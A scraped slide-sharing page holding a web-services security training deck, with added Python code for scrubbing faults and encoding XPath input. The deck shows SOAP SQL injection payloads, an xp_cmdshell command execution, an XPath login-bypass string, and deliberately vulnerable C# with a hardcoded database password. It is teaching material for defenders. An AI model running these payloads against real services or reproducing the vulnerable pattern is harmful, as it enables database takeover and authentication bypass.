HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams Security
 

Recently uploaded

Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastUXDXConf
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...marcuskenyatta275
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoUXDXConf
 
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FIDO Alliance
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoTAnalytics
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreelreely ones
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKUXDXConf
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfFIDO Alliance
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekCzechDreamin
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Julian Hyde
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...CzechDreamin
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftshyamraj55
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsStefano
 
Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024TopCSSGallery
 

Recently uploaded (20)

Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, Ocado
 
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreel
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024
 

Web Services Hacking and Security

• 1. Web Services Hacking and Security
• 2. Recent analysis of Cloud App
  • Enterprise Content Management – Cloud App
  • Technologies & Components – APIs, OAuth, SAML, SOAP, Ajax etc.
  • Traditional Scanning – What to scan 
  • Hacking and Hands-On
    – SQL injection over APIs
    – XSS on Mobile interface
    – Authorization bypass (Look at other’s content)
    – Information leaks through JSON fuzzing
    – CSRF
    – Virtual Sand Box bypasses
    – Mobile interface compromised
• 3. Attacks
  • Vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud.
  • DDoS attack rains down on Amazon cloud
  • Cross-VM side-channel attacks to extract information from a target VM on the same machine.
  • The use of virtualization by cloud service providers to host virtual machines belonging to multiple customers on a shared physical infrastructure is opening up fresh data leak risks, a research report warns.
• 4. What is common in all?
  • All over Web and HTTP
  • Web Security and Hacking is very relevant for Cloud
  • Cloud = Web 2.0 + SOA + Something-Else
  • Lot of hacks are already happening on Cloud apps over HTTP
  • Game is changing and becoming interesting …
• 5. Security!
  • Web service - evolving as new attack point in application framework.
  • Toolkits and Exploits are coming up
  • Too many protocols and confusion
  • Race for deployment – poor implementation
  • Cases and attacks are growing with growth in business usage
• 6. Security! (architecture diagram)
  Diagram zones: End Client | In Transit | Vendor Controlled | User Controlled
  Diagram flow: Web Services Client → HTTP POST (SOAP Envelope) → Web Server (80/443) → Web Services Engine → Web Services Binaries → Web Services Deployment Shell → Web Services Code & Components
• 7. Security! (attack surface diagram)
  Diagram flow: Attack Agent → Attack Method → Attack Vector → Exploit → Vulnerability
  Diagram layers: In Transit → Web Services Engine → Web Services Deployment → Web Services Code → Web Services Resource (Database, File System, Network Resource); Defense Controls
• 8. Assessment strategies
  Diagram labels: Web Services Risk Model; Web Services Defense Controls; Blackbox Assessment; Whitebox Assessment
• 9. Technology Deployment (deployment diagram)
  Diagram zones: Internet | DMZ | Trusted Internal/Corporate
  Diagram flow: Web Service Client → Web Server (IIS/Apache) → Application Servers (.Net/Tomcat) → Web Services Container (Axis) → DB
  Web Services Container: SOAP server, SOAP over HTTP/HTTPS, XML Parsing, WSDL, Transport etc. Web Services Code resides here.
• 10. Web services evaluation methodology
  Footprinting → Discovery → Public domain search → Enumeration → Manual Audit → Auto Audit → Defense
• 11. Risk - In transit
  • In transit Sniffing or Spoofing
  • WS-Routing security concern
  • Replay attacks
• 12. Risk - Web services Engine
  • Buffer overflow
  • XML parsing attacks
  • Spoiling Schema
  • Complex or Recursive structure as payload
  • Denial of services
  • Large payload
• 13. Web services Deployment - Risk
  • Fault code leaks
  • Permissions & Access issues
  • Poor policies
  • Customized error leakage
  • Authentication and Certification
• 14. Web services User code - Risk
  • Parameter tampering
  • WSDL probing
  • SQL/LDAP/XPATH/OS command injection
  • Virus/Spyware/Malware injection
  • Bruteforce
  • Data type mismatch
  • Content spoofing
  • Session tampering
  • Format string
  • Information leakage
  • Authorization
• 15. © Blueinfy Solutions Pvt. Ltd. Scanning SOA
• 16. Web Service Search
  • Search in the public domain
  • Tool – Search Engines
  • Google – An excellent tool
  • Look for wsdl, asmx, jws etc.
  • Filetype and allinurl are best friends
• 17. Technology Identification
  • Platform on which Web services are running
  • Configuration and Structures
  • File extensions
  • Path discovery
  Very useful information!
• 18. Technology Identification
  • Location can be obtained from UDDI as well, if already published.
  • WSDL location [ Access Point ]: http://192.168.11.2/ws/dvds4less.asmx?wsdl
  • .asmx – indicates .Net server from MS
• 19. Technology Identification
  • Similarly, .jws – for Java web services
  • /ws/ - in the path indicates web services
  • MS-SOAPToolkit can be identified as well
    C:\> nc 192.168.11.2 80
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 28 Sep 2004 18:48:20 GMT
    X-Powered-By: ASP.NET
    Connection: Keep-Alive
    Content-Length: 7565
    Content-Type: text/html
    Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/
    Cache-control: private
• 20. Technology Identification
  • Resource header throws up some information as well
    C:\> nc 192.168.11.2 80
    HEAD /ws/dvds4less.asmx HTTP/1.0

    HTTP/1.1 500 Internal Server Error
    Server: Microsoft-IIS/5.0
    Date: Tue, 28 Sep 2004 18:50:09 GMT
    X-Powered-By: ASP.NET
    X-AspNet-Version: 1.1.4322
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 3026
• 21. WSDL Scanning/Enumeration
  • What is WSDL?
  • What information can one enumerate from WSDL?
  • WSDL exposure: Threat or not?
• 22. WSDL
  • Web Services Definition Language
  • Similar to IDL for remote calls used in CORBA or other remote invoke methods.
  • Contains detail of methods
  • Types of I/O
  • Parameters of methods
  • It is an XML document with standards.
• 24. WSDL <Service>
    <service name="dvds4less">
      <port name="dvds4lessSoap" binding="s0:dvds4lessSoap">
        <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/>
      </port>
    </service>
  Where is the call going to go? This is where the service is listening.
• 25. WSDL <portType>
    <portType name="dvds4lessSoap">
      <operation name="Intro">
        <input message="s0:IntroSoapIn"/>
        <output message="s0:IntroSoapOut"/>
      </operation>
      <operation name="getProductInfo">
        <input message="s0:getProductInfoSoapIn"/>
        <output message="s0:getProductInfoSoapOut"/>
      </operation>
      <operation name="getRebatesInfo">
        <input message="s0:getRebatesInfoSoapIn"/>
        <output message="s0:getRebatesInfoSoapOut"/>
      </operation>
    </portType>
  Methods one can call
• 26. WSDL <Message>
    <portType name="dvds4lessSoap">
      <operation name="getProductInfo">
        <input message="s0:getProductInfoSoapIn"/>
        <output message="s0:getProductInfoSoapOut"/>
      </operation>
    </portType>
    <message name="getProductInfoSoapIn">
      <part name="parameters" element="s0:getProductInfo"/>
    </message>
    <message name="getProductInfoSoapOut">
      <part name="parameters" element="s0:getProductInfoResponse"/>
    </message>
• 27. WSDL <Types>
    <s:element name="getProductInfo">
      <s:complexType>
        <s:sequence>
          <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
        </s:sequence>
      </s:complexType>
    </s:element>
    <s:element name="getProductInfoResponse">
      <s:complexType>
        <s:sequence>
          <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/>
        </s:sequence>
      </s:complexType>
    </s:element>
    <message name="getProductInfoSoapIn">
      <part name="parameters" element="s0:getProductInfo"/>
    </message>
    <message name="getProductInfoSoapOut">
      <part name="parameters" element="s0:getProductInfoResponse"/>
    </message>
• 28. WSDL Profile after Scan
  Methods          INPUT      OUTPUT
  Intro            - None -   String
  getProductInfo   String     String
  getRebatesInfo   String     String
• 29. © Blueinfy Solutions Pvt. Ltd. SOAP in Action
• 30. How to access?
  • Knowing WSDL profile – What next?
  • Access web services – see what goodies you can get
  • How?
• 31. How to access SOAP?
  • Simple Object Access Protocol
  • Invoking objects on remote machine
  • I/O with remote objects
  • It is XML-based messaging
  • Works over HTTP/HTTPS and on few other protocols
  • That is why firewall cannot block them.
  • Attacks are easy and possible.
• 32. SOAP request
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfo xmlns="http://tempuri.org/">
          <id>1</id>
        </getProductInfo>
      </soap:Body>
    </soap:Envelope>
  (callouts: SOAP Envelope; Method Call; Input to the method)
• 33. SOAP response
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfoResponse xmlns="http://tempuri.org/">
          <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
        </getProductInfoResponse>
      </soap:Body>
    </soap:Envelope>
  (callouts: SOAP Envelope; Method response; Output of the method)
• 34. © Blueinfy Solutions Pvt. Ltd. SOA Attacks
• 35. AV 1 - XML poisoning
  • XML node manipulation
  • Attack on parsing logic
    – SAX
    – DOM
  • Can be lethal – DoS or breaking execution logic
• 36. XML poisoning
    <CustomerRecord>
      <CustomerNumber>289001</CustomerNumber>
      <FirstName>John</FirstName>
      <LastName>Smith</LastName>
      <Address>Apt 31, 1st Street</Address>
      <Email>john@smith.com</Email>
      <PhoneNumber>3809922347</PhoneNumber>
    </CustomerRecord>
• 38. XML poisoning
    <CustomerRecord>
      <CustomerNumber>289001</CustomerNumber>
      <FirstName>John</FirstName>
      <FirstName>John</FirstName>
      ... 100 times ...
      <FirstName>John</FirstName>
      <LastName>Smith</LastName>
      <Address>Apt 31, 1st Street<Address>
      <Email>john@smith.com<Email>
      <PhoneNumber>3809922347<PhoneNumber>
    </CustomerRecord>
• 39. Parameter tampering & Fault code leakage
  • Fault codes of web services spit out a lot of information about internal workings.
  • This attack can fetch internal paths, database interfaces etc.
  • Fault code is part of the SOAP envelope and this helps an attacker to make logical deductions about assets.
• 40. SOAP request
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getRebatesInfo xmlns="http://tempuri.org/">
          <fileinfo>abx.xyz</fileinfo>
        </getRebatesInfo>
      </soap:Body>
    </soap:Envelope>
  (callouts: SOAP Envelope; Method Call; Input to the method; Forcing Fault Code; Source of Enumeration)
• 41. SOAP response
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <soap:Fault>
          <faultcode>soap:Server</faultcode>
          <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:\inetpub\wwwroot\rebates\abx.xyz&amp;quot;.</faultstring>
          <detail />
        </soap:Fault>
      </soap:Body>
    </soap:Envelope>
  (callouts: Path Enumeration; Fault Code)
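The defensive counterpart of slides 39 to 41 is to scrub fault text on the server before it reaches the client. The following is an added example, not code from the slides: a response-side filter that flags and replaces the leaky faultstrings shown here and on the SQL Server fault later; the signature list and the sample faults are constructed (the samples reproduce the slide text).

```python
"""Response-side filter: scrub SOAP faults that leak internals before they leave the server.

Added example, not from the slides. The sample faults are constructed to
reproduce the faultstrings on the slides (a Windows file path and a SQL Server
error text); the signature list is illustrative, not a product's rule set.
"""
import re
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ET.register_namespace("soap", SOAP_ENV)

# Patterns that mark a faultstring as revealing internal detail (constructed list).
LEAK_PATTERNS = [
    ("windows path", re.compile(r"\b[a-z]:\\?(?:inetpub|windows|program files|users)", re.I)),
    ("file not found", re.compile(r"could not find file", re.I)),
    ("sql server error", re.compile(r"cannot use empty object or column names", re.I)),
    ("stack trace", re.compile(r"\bat [\w.`]+\(", re.I)),
]
GENERIC_FAULT = "Server was unable to process request."


def _envelope(fault_text):
    """Wrap a faultstring in a SOAP 1.1 fault envelope (constructed test input)."""
    return (f'<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body><soap:Fault>'
            f"<faultcode>soap:Server</faultcode><faultstring>{fault_text}</faultstring>"
            f"<detail /></soap:Fault></soap:Body></soap:Envelope>")


# Constructed samples reproducing the slide faultstrings.
PATH_FAULT = _envelope("Server was unable to process request. --&gt; Could not find file "
                       r"&quot;c:\inetpub\wwwroot\rebates\abx.xyz&quot;.")
SQL_FAULT = _envelope("Server was unable to process request. --&gt; Cannot use empty "
                      "object or column names. Use a single space if necessary.")
CLEAN_FAULT = _envelope("Server was unable to process request.")


def sanitize_fault(xml_text):
    """Return (sanitized_xml, findings); findings lists the leak labels that fired."""
    root = ET.fromstring(xml_text)
    findings = []
    for fault in root.iter(f"{{{SOAP_ENV}}}Fault"):
        fs = fault.find("faultstring")        # SOAP 1.1 fault children are unqualified
        if fs is None or not fs.text:
            continue
        hits = [label for label, rx in LEAK_PATTERNS if rx.search(fs.text)]
        if hits:
            findings.extend(hits)            # log these server-side, never return them
            fs.text = GENERIC_FAULT          # the client gets the generic text only
            detail = fault.find("detail")
            if detail is not None:
                detail.clear()               # and no diagnostic detail either
    return ET.tostring(root, encoding="unicode"), findings


if __name__ == "__main__":
    for sample in (PATH_FAULT, SQL_FAULT, CLEAN_FAULT):
        sanitized, hits = sanitize_fault(sample)
        print(hits, sanitized)
```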
• 42. AV 3 - SQL injection
  • SQL injection can be done using SOAP traffic.
  • It is an innovative way of identifying database interface points.
  • One can leverage xp_cmdshell via SOAP.
  • Back end database can be compromised using this attack.
• 43. SOAP request
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfo xmlns="http://tempuri.org/">
          <id>1</id>
        </getProductInfo>
      </soap:Body>
    </soap:Envelope>
  (callouts: SOAP Envelope; Method Call; Input to the method)
• 44. SOAP response
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfoResponse xmlns="http://tempuri.org/">
          <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
        </getProductInfoResponse>
      </soap:Body>
    </soap:Envelope>
  (callout: Product Information)
• 45. SOAP response
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <soap:Fault>
          <faultcode>soap:Server</faultcode>
          <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring>
          <detail />
        </soap:Fault>
      </soap:Body>
    </soap:Envelope>
  (callouts: Indicates SQL Server; Place for SQL Injection; Fault Code)
• 46. SOAP request
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfo xmlns="http://tempuri.org/">
          <id>1 or 1=1</id>
        </getProductInfo>
      </soap:Body>
    </soap:Envelope>
  (callouts: Popular SQL Injection; Fault Code)
• 47. SOAP response
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfoResponse xmlns="http://tempuri.org/">
          <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/</getProductInfoResult>
        </getProductInfoResponse>
      </soap:Body>
    </soap:Envelope>
  (callouts: Works!! Entire Table Is out)
• 48. SOAP request
    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfo xmlns="http://tempuri.org/">
          <id>1;EXEC master..xp_cmdshell 'dir c:\ > c:\inetpub\wwwroot\ws\dir.txt'</id>
        </getProductInfo>
      </soap:Body>
    </soap:Envelope>
  (callouts: Exploiting this Vulnerability; Exploit code)
• 49. SOAP response
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfoResponse xmlns="http://tempuri.org/">
          <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
        </getProductInfoResponse>
      </soap:Body>
    </soap:Envelope>
  (callouts: Works!! Looks Normal response)
• 50. SOAP response (screenshot slide)
  But … Code got executed. Looks Normal response. Got Admin via cmdshell.
• 51. AV 4 – XPATH injection
  • XPATH is a new way of querying XML documents.
  • This attack works nicely on web services since they use XML extensively.
  • Developer’s loophole can be leveraged with an exploit.
  • XPATH query crafting is a next generation attack method.
• 52. XPATH Injection - Basics
  • XPATH is a language defined to find information in an XML document.
  • As the XPATH name suggests, it indeed uses a path to traverse the nodes of an XML document and look for specific information in the document.
  • XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc. These help in traversing an XML document.
• 53. XPATH – Vulnerable Code
    using System.Xml;
    using Microsoft.Data.SqlXml;

    // 'user' and 'pass' arrive unvalidated from the SOAP request
    string fulltext = "";
    string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
    SqlXmlCommand co = new SqlXmlCommand(coString);
    co.RootTag = "Credential";
    co.CommandType = SqlXmlCommandType.Sql;
    co.CommandText = "SELECT * FROM users for xml Auto";
    XmlReader xr = co.ExecuteXmlReader();
    xr.MoveToContent();
    fulltext = xr.ReadOuterXml();
    XmlDocument doc = new XmlDocument();
    doc.LoadXml(fulltext);
    // user input is concatenated straight into the XPath expression
    string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
    XmlNodeList xmln = doc.SelectNodes(credential);
    if (xmln.Count > 0)
    {
        // True: a node matched, caller is treated as authenticated
    }
    else
    {
        // False
    }
• 54. Attacking XPATH point
  • //users[@username='"+user+"' and @password='"+pass+"']
  • XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
  • This will always be true on the first node and the user can get access as whoever the first user is.
  • //users[@username='' or 1=1 or ''='' and @password='any'] Bingo!
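The following is an added example, not code from the slides: the same credential check in Python, with the slide's unsafe string construction placed beside two hardened forms, an XPath 1.0 literal encoder for APIs without variable binding, and a lookup that keeps user input out of the query entirely. The user store is constructed sample data.

```python
"""Hardened counterparts of the XPath credential check on the slide.

Added example, not from the slides. build_query_unsafe() repeats the slide's
string concatenation so the injected expression is visible; xpath_literal()
encodes any string as an XPath 1.0 literal (quotes or concat(), the standard
technique when the XPath API offers no variable binding); check_credentials()
avoids the problem entirely by keeping user input out of the query. The user
store is constructed sample data.
"""
import hmac
import xml.etree.ElementTree as ET

USERS_XML = """<Credential>
  <users username="admin" password="s3cret"/>
  <users username="john" password="nemo"/>
</Credential>"""

INJECTION = "' or 1=1 or ''='"   # the string from the "Attacking XPATH point" slide


def build_query_unsafe(user, pw):
    """The slide's pattern: user input spliced straight into the expression."""
    return "//users[@username='" + user + "' and @password='" + pw + "']"


def xpath_literal(value):
    """Encode an arbitrary string as an XPath 1.0 string literal."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # Both quote kinds present: split on single quotes (each part is then safe
    # inside single quotes) and glue the pieces back together with concat().
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append('"\'"')           # the single quote itself
    return "concat(" + ", ".join(pieces) + ")"


def build_query_safe(user, pw):
    """Same query, but every user-controlled value is a proper literal."""
    return f"//users[@username={xpath_literal(user)} and @password={xpath_literal(pw)}]"


def check_credentials(users_xml, user, pw):
    """No user text in the XPath at all: select every user node with a fixed
    path and compare the attributes in code, in constant time."""
    root = ET.fromstring(users_xml)
    for node in root.iterfind(".//users"):
        same_user = hmac.compare_digest(node.get("username", "").encode(), user.encode())
        same_pw = hmac.compare_digest(node.get("password", "").encode(), pw.encode())
        if same_user and same_pw:
            return True
    return False


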